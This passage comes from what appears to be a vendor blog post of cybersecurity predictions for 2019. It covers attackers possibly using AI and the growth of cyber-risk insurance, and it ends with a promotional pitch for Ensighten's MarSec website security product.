With every type of attack prevented, hackers create new and more sophisticated ways to breach the standard defences. The worry is that AI could be the ‘next big thing’ for the attackers, allowing them to configure and learn defence tools and bypass even the most advanced security implementations. This is something cybersecurity professionals will have to work hard to counter in 2019 through various measures including website marketing security.
5. The start of cyber-risk insurance
With cyberattacks costing the global economy an incredible $600bn annually, it’s perhaps little surprise that businesses are looking for new ways to protect themselves against the colossal risks. As a result, we expect to see cyber-risk insurance become an increasingly common part of the operational risk strategies many firms put in place.
At the moment, there is a fairly limited range of policies available. However, in 2019, we expect to more and more cyber-risk policies that are tailored to the specific risks smaller and medium-sized businesses face. That could include cover for the loss of reputation and even the loss of future revenues from negative media coverage, although clearly, such policies will not come cheap.
Protect your website in 2019
67 percent of businesses are yet to implement marketing security for their website and are putting their customers and their reputations at risk. Ensighten MarSec provides protection against data risks to keep your website customer data secure and safeguarded against data breaches in 2019 and beyond. Get in touch to discuss your requirements or arrange a demo today.